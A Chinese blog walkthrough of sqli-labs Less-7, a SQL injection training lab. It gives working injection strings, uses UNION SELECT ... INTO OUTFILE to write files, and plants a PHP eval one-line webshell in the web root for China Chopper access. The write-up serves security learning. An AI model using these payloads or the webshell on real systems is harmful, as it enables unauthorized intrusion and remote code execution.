2020.4.2 sqli-labs--第7关①

最新推荐文章于 2024-05-29 08:30:00 发布
最新推荐文章于 2024-05-29 08:30:00 发布
阅读量740 收藏
点赞数 1
分类专栏: web安全
原文链接:https://blog.csdn.net/sdb5858874/article/details/80727555
版权

1.这里科普一下file权限和into outfile这个函数。
数据库的file权限规定了数据库用户是否有权限向操作系统内写入和读取已存在的权限。
into outfile命令:select into outfile命令作用将查询结果输出保存到一个文件中
使用的环境:
我们必须知道,服务器上一个可以写入文件的文件夹的完整路径

2.我们正常输入?id=1页面回显如下
在这里插入图片描述3.当我们输入 and 1=2 页面显示依然正常,说明不是数值型注入
在这里插入图片描述4.当我们输入?id=1’页面报错,说明可能存在"注入
在这里插入图片描述5.当我们输入?id=1’ --+页面显示依然不正常
在这里插入图片描述6.接着我们尝试?id=1’) --+,页面依然显示不正常,有点难受,不过没关系
在这里插入图片描述7.我们可以接着输入?id=5’)) --+尝试,发现页面回显正常
在这里插入图片描述由于本关卡提示我们使用file权限向服务器写入文件,我们就先尝试下写数据
由于我用的是phpstudy搭建的环境,所以我直接在我本机取一个目录就好

C:\phpStudy\PHPTutorial\MySQL\data在这里插入图片描述然后使用

union select 1,2,3 into outfile "C:\phpStudy\PHPTutorial\MySQL\data\chao.php"

尝试写入文件。
然后去本机文件夹下查看文件是否写入成功。
在这里插入图片描述写入成功了,但是文件名变成了如图红色表示的那样!!
接着我进行了好多次尝试,最后被同学告知,需要使用\来代替目录中的\ ,具体原因我也不知道,后续会补上。 命令如下:

union select 1,2,3 into outfile "C:\\phpStudy\\PHPTutorial\\MySQL\\data\\chao.php"

在这里插入图片描述
文件导入成功!,接着我们查看chao.php的内容
在这里插入图片描述要注意的是利用数据库file权限向操作系统写入文件时, 对于相同文件名的文件不能覆盖,所以如果第一次上传chao.php,下次在上传chao.php,就是无效命令了,也就是新的chao,php中的内容并不会覆盖,之前的chao.php

我们再尝试上传一句话木马,具体命令

?id=-1'))  union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\hello.php" --+

接着试着访问一下这个文件
在这里插入图片描述
上传成功,使用菜刀链接下
在这里插入图片描述

藏蓝色的达达
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqlilabs(SQL注入)小白通基础通笔记(专针对小白)(第七Less-7)
u013630181的博客
07-05 278
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ut
sqli-labs第七
m0_73248913的博客
02-06 163
sqli注入第七
Sqli-labs-master靶场1-20通教程
最新发布
weixin_68416970的博客
05-29 976
Sqli-labs-master靶场1-20通教程
sqli_lab
ing_end的博客
03-05 3481
读写文件 此状态不允许导入导出状态 修改限制成功 – (这里有一个空格,–空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用–+代替-- ,原因是+在URL被URL编码后会变成空格。 显示位: 这个显示位指的是网页中能够显示数据的位置。 举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,
sqli-labs练习(七)-----GET-Dump into outfile-String
wkend的博客
04-22 2025
根据提示,输入id参数1 输入1'出现报错信息,可是并没有错误的描述信息 输入1",返回正常 这里和前面基本一样,只有两种回显结果,但是唯一的区别就是错误回显并没有详细的错误描述。这下不好办了,怎么才能从数据库得到我们想要的数据呢??? 注意返回正常时的回显语句You are in.... Use outfile......可以看到,这里给出了提示Use outfile...
Sqli-labs——lesson7
weixin_62281892的博客
06-29 497
lesson7
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs.rar
12-22
2. SQL注入平台sqli-labs源码:即压缩包内的`sqli-labs`文件夹,包含了各种SQL注入挑战的网页和脚本。 搭建步骤如下: 1. 安装PHPstudy:访问PHPstudy官方网站下载最新版本,根据提示安装到本地计算机上。 2. 启动...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
【Mysql】into outfile报错的问题
cml2016的博客
05-31 1555
明明有select 权限却报错 mysql> select * from server into outfile '/tmp/tt.txt'; ERROR 1045 (28000): Access denied for...
sqli-labs-master第七Less-7超详细360°无死角教程
hih30250的博客
11-25 1055
不带参数请求页面:可以看到,页面让我们输入id,我们输入一个?id=1作为参数:可以看到给出了正常的数据。我们再输入一个不存在的id参数?id=999可以看到页面给出SQL语句语法错误。
sqli-labs 第七 多命通攻略
两个月亮
01-05 1621
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
sqli-labs第七
学习
08-24 1006
在第五六卡了好几天,终于走到第七了,首先查看源代码可以看到,SQL查询语句为SELECT * FROM users WHERE id=(('3' )) -- ')) LIMIT 0,1 于是构造绕过语句 192.168.18.136/sqli-labs-master/Less-7/?id=3' )) --+ 接下来,我们发现 union 1,2,3一点用都没有 ...
sqli-labs通详解(1-20
2302_81105681的博客
04-11 2621
1.首先判断闭合方式在我之前发布的文章中有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面中4.爆数据库名我们可以将2或者3更改为database()来使页面回显出数据库名。
sqli-labs靶场7(知道根目录的注入)
qq_46527080的博客
12-12 799
知识点 首先要掌握一下相的函数和知识点 函数: load_file()函数 是MySQL读取本地文件的函数(读取) into outfile()函数 是用来导出文件的(写入) @@basedir函数 查询当前路径 @@datadir函数 查询数据库安装路径 1.load_file()函数用法 2.into outfile()函数用法 查看一下 3.查询当前路径: select @@basedir; 4.查询当前MySQL路径: select @@datadir; 5.解决写入权限问题 在
sqllab第七笔记
I_WORM的博客
03-13 618
如果是简单的单引号绕过的话,注释符应该把后面的那个引号进行注释了,那么and后面的引号应该会因为引号不闭合进行报错,但是这里正常显示了,这里就搞不懂了;设置payload2为字符组合类型(brute forcer),设置最小长度和最大长度都为1,因为他会把指定区间的长度都进行枚举,这里只需要进行字符爆破,所以设定长度为1,这样就是枚举每个字符和数字了。开始爆破,得出结果后进行过滤;因为错误和正确的输出长度是一样的,所以没办法利用长度进行辨别,点击上面的过滤条件,将正确的输出内容复制到过滤条件中,点击应用。
sqli-labs靶场无法写入问题解决“ it cannot execute this statement”和“You have an error in your SQL syntax”
02-21 1163
无法写入之"The MySQL server is running with the --secure-file-priv option so it cannot execute this statement"和“You have an error in your SQL syntax”
SQLi-Labs刷题记录】 第七思路
gavinmao97的博客
09-19 3972
/* 作者刚刚接触sql注入,本文仅用作记录刷sqli-labs靶场时的思路,仅代表个人的看法,如有不当之处,欢迎各位大佬及时批评指正! */ 根据卡的名称dump into outfile可知,sqli-labs第七的考查点是数据库的文件操作。 SQLi-Labs Less-7 首先,按照提示输入id参数,尝试寻找注入点 构建url: …/Less-7/?id=1 页面显示正常,提示使用outfile语句 构建url:…/Less-7/?id=1’ 页面报错,但是没有提示报错信息。输入引起报错,我

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值